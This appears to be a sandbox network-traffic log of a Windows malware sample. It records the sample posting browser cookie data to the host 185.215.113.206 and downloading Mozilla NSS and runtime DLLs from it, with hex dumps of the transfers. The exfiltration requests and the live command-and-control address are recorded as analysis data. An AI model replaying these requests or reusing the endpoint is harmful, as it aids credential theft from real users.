00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Nov 26, 2024 00:25:17.086853027 CET	224	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Nov 26, 2024 00:25:17.089246988 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 26, 2024 00:25:17.089539051 CET	1236	IN	Data Raw: ff 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 51 f6 0a 00 83 ec 0c 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 2a f6 0a 00 83 ec 0c 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 73 fc ff ff 83 ec 0c e9 d9 fe ff ff 89 7c 24 08 c7 44 24 Data Ascii: \|$D$4$Q\|$D$4$*\|$D$4$s\|$D$4$'aT$$tL$(D$ M&T$T$U=xgat9$pa\|aQtD$pa$aRR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49763	185.215.113.206	80	4592	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 26, 2024 00:25:26.409961939 CET	629	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHIJDHIDBGHJKECBFIID Host: 185.215.113.206 Content-Length: 427 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 48 49 4a 44 48 49 44 42 47 48 4a 4b 45 43 42 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 37 35 65 30 35 38 32 36 39 66 63 34 37 35 30 30 34 33 36 38 39 36 31 64 65 66 66 39 63 36 34 39 35 34 37 66 39 34 37 35 34 31 63 33 37 39 66 34 62 62 32 62 63 61 61 35 62 31 30 38 33 35 34 39 33 39 30 65 34 66 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 44 48 49 44 42 47 48 4a 4b 45 43 42 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 44 48 49 44 42 47 48 4a 4b 45 43 42 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------DHIJDHIDBGHJKECBFIIDContent-Disposition: form-data; name="token"4675e058269fc475004368961deff9c649547f947541c379f4bb2bcaa5b1083549390e4f------DHIJDHIDBGHJKECBFIIDContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------DHIJDHIDBGHJKECBFIIDContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------DHIJDHIDBGHJKECBFIID--
Nov 26, 2024 00:25:28.337651014 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 26, 2024 00:25:28.719374895 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGIJEGCGDGHDHIDHDGCB Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 47 49 4a 45 47 43 47 44 47 48 44 48 49 44 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 37 35 65 30 35 38 32 36 39 66 63 34 37 35 30 30 34 33 36 38 39 36 31 64 65 66 66 39 63 36 34 39 35 34 37 66 39 34 37 35 34 31 63 33 37 39 66 34 62 62 32 62 63 61 61 35 62 31 30 38 33 35 34 39 33 39 30 65 34 66 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 45 47 43 47 44 47 48 44 48 49 44 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 45 47 43 47 44 47 48 44 48 49 44 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------BGIJEGCGDGHDHIDHDGCBContent-Disposition: form-data; name="token"4675e058269fc475004368961deff9c649547f947541c379f4bb2bcaa5b1083549390e4f------BGIJEGCGDGHDHIDHDGCBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BGIJEGCGDGHDHIDHDGCBContent-Disposition: form-data; name="file"------BGIJEGCGDGHDHIDHDGCB--
Nov 26, 2024 00:25:29.675637007 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49795	185.215.113.206	80	4592	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 26, 2024 00:25:35.990187883 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDBFIIEBGCAKKEBFBAAF Host: 185.215.113.206 Content-Length: 3087 Connection: Keep-Alive Cache-Control: no-cache
Nov 26, 2024 00:25:35.990236044 CET	3087	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 37 35 65 30 Data Ascii: ------JDBFIIEBGCAKKEBFBAAFContent-Disposition: form-data; name="token"4675e058269fc475004368961deff9c649547f947541c379f4bb2bcaa5b1083549390e4f------JDBFIIEBGCAKKEBFBAAFContent-Disposition: form-data; name="file_name"Y29va2llc1xNa
Nov 26, 2024 00:25:37.879789114 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:37 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 26, 2024 00:25:38.260354042 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKFHIIEHIEGDHJJJKFII Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 46 48 49 49 45 48 49 45 47 44 48 4a 4a 4a 4b 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 37 35 65 30 35 38 32 36 39 66 63 34 37 35 30 30 34 33 36 38 39 36 31 64 65 66 66 39 63 36 34 39 35 34 37 66 39 34 37 35 34 31 63 33 37 39 66 34 62 62 32 62 63 61 61 35 62 31 30 38 33 35 34 39 33 39 30 65 34 66 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 48 49 49 45 48 49 45 47 44 48 4a 4a 4a 4b 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 48 49 49 45 48 49 45 47 44 48 4a 4a 4a 4b 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------JKFHIIEHIEGDHJJJKFIIContent-Disposition: form-data; name="token"4675e058269fc475004368961deff9c649547f947541c379f4bb2bcaa5b1083549390e4f------JKFHIIEHIEGDHJJJKFIIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JKFHIIEHIEGDHJJJKFIIContent-Disposition: form-data; name="file"------JKFHIIEHIEGDHJJJKFII--
Nov 26, 2024 00:25:39.207853079 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 26, 2024 00:25:40.124677896 CET	94	OUT	GET /68b591d6548ec281/freebl3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 26, 2024 00:25:40.611821890 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:40 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Nov 26, 2024 00:25:40.611843109 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b Data Ascii: UhOt8]h1]UWVEtu}UMt"0(h&40jVjjRQP?^_]USWVhO?t0
Nov 26, 2024 00:25:40.611855984 CET	248	IN	Data Raw: 55 07 08 00 83 c4 08 eb ce cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 83 ec 58 89 4c 24 2c 8b 7d 1c a1 b4 30 0a 10 31 e8 89 44 24 50 c7 44 24 3c 10 00 00 00 83 ff 18 72 19 89 f8 83 e0 07 75 12 8d 47 f8 3b 45 14 76 14 68 03 e0 ff Data Ascii: UUSWVXL$,}01D$PD$<ruG;Evhh\|$,}uT$4D$0P\|OL$8PVS'D$@?@L$L$D$D$D$$
Nov 26, 2024 00:25:40.611865997 CET	1236	IN	Data Raw: 00 00 31 d2 31 c9 89 5c 24 28 eb 24 89 c7 8b 44 24 1c 83 c0 01 83 f8 06 8b 54 24 18 8b 4c 24 14 0f 84 e2 01 00 00 89 44 24 1c 8a 44 24 07 04 ff 8b 74 24 38 0f 1f 84 00 00 00 00 00 89 c3 88 44 24 07 8b 44 24 40 89 cf 89 4c 24 14 0f b6 c9 c1 e1 18 Data Ascii: 11\$($D$T$L$D$D$t$8D$D$@L$T$\|$ L$$\$\$T$1%1%1T$D\|$@\|$t\$(D$\$(sFD$,D$
Nov 26, 2024 00:25:40.611879110 CET	1236	IN	Data Raw: 45 dc 89 ca f7 da c1 fa 1f f7 d2 8b 45 1c 80 7c 30 f7 01 19 db 09 d3 b8 01 00 00 00 29 c8 c1 f8 1f 8b 55 1c 80 7c 32 f6 01 19 d2 f7 d0 09 c2 21 da 21 fa b8 02 00 00 00 29 c8 c1 f8 1f f7 d0 8b 5d 1c 80 7c 33 f5 01 19 ff 09 c7 b8 03 00 00 00 29 c8 Data Ascii: EE\|0)U\|2!!)]\|3)\|3!)}\|7!!)U\|2)\|2!!)M\|1t/EU;U]w"1E9t:RVP -
Nov 26, 2024 00:25:40.611900091 CET	1236	IN	Data Raw: 45 08 c7 47 08 00 00 00 00 89 47 04 8b 48 04 ff 15 00 80 0a 10 ff d1 89 07 85 c0 74 31 8b 55 0c 89 f9 ff 75 14 ff 75 10 e8 17 fd ff ff 83 c4 08 85 c0 74 2c 8b 1f 85 db 74 14 8b 47 04 8b 48 0c ff 15 00 80 0a 10 6a 01 53 ff d1 83 c4 08 c7 47 08 01 Data Ascii: EGGHt1Uuut,tGHjSGW:G^_[]USWVUM]u>F9t:NVFMUtHHjWhjV4%tUVPdnFEFEF
Nov 26, 2024 00:25:40.611912012 CET	1236	IN	Data Raw: 31 e9 e8 29 f6 07 00 89 f0 81 c4 04 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 b4 30 0a 10 31 e8 89 45 f0 68 02 01 00 00 e8 9f f7 07 00 83 c4 04 31 ff 85 c0 0f 84 fc 00 00 00 89 c6 8b 45 0c Data Ascii: 1)^_[]USWV01Eh1E=s hkhVohh !Vf.@uVuW)9wSuWT
Nov 26, 2024 00:25:40.611923933 CET	1236	IN	Data Raw: 89 cf 8b 45 f0 88 14 30 00 d3 0f b6 c3 8b 4d 10 8a 51 02 8b 4d f0 32 14 01 8b 4d d4 8b 45 e4 88 50 02 8b 5d dc 8b 45 d0 8b 55 d8 2b 55 cc 89 55 d8 83 c7 04 83 c3 04 8b 55 e0 39 d1 0f 86 c9 01 00 00 29 d1 0f 84 de 01 00 00 89 5d dc 89 7d e4 89 c8 Data Ascii: E0MQM2MEP]EU+UUU9)]}1EEMAMfo 1ff}]fn4ff`fafofrfo f[fpffpffof
Nov 26, 2024 00:25:40.611936092 CET	620	IN	Data Raw: 88 14 18 8b 5d dc 00 d6 0f b6 c6 8b 55 f0 0f b6 04 02 c1 e0 18 09 f0 8b 75 d8 33 45 d4 8b 55 e8 89 04 13 8b 45 e8 83 c6 fc 83 c0 04 89 75 d8 83 fe 03 0f 87 f0 fe ff ff 8b 7d ec 01 c7 8b 55 e4 01 c2 89 c6 89 d0 01 f3 89 ca 83 7d d8 00 0f 84 03 02 Data Ascii: ]Uu3EUEu}U}]E]E8u40480u}T20ETEuE14^_[]UM1]U}f.MM
Nov 26, 2024 00:25:40.611958981 CET	1236	IN	Data Raw: ff 8b 45 ec 04 07 89 45 ec 0f b6 c0 8b 7d f0 8a 0c 07 00 ce 0f b6 f6 8a 2c 37 88 2c 07 88 0c 37 00 cd 8b 45 10 8a 40 06 0f b6 cd 32 04 0f 88 43 06 8b 4d ec e9 2e f7 ff ff cc cc cc 55 89 e5 53 57 56 81 ec 5c 01 00 00 89 8d dc fe ff ff 8b 32 89 95 Data Ascii: EE},7,7E@2CM.USWV\2tRAA q$]QD1A@1RQP5}gjM31tQI
Nov 26, 2024 00:25:42.091236115 CET	94	OUT	GET /68b591d6548ec281/mozglue.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 26, 2024 00:25:42.540069103 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:42 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Nov 26, 2024 00:25:43.432149887 CET	95	OUT	GET /68b591d6548ec281/msvcp140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 26, 2024 00:25:43.878880024 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:43 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Nov 26, 2024 00:25:44.555888891 CET	91	OUT	GET /68b591d6548ec281/nss3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 26, 2024 00:25:45.002908945 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:44 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Nov 26, 2024 00:25:48.189681053 CET	95	OUT	GET /68b591d6548ec281/softokn3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 26, 2024 00:25:48.636513948 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:48 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Nov 26, 2024 00:25:49.265820026 CET	99	OUT	GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 26, 2024 00:25:49.713963032 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:49 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
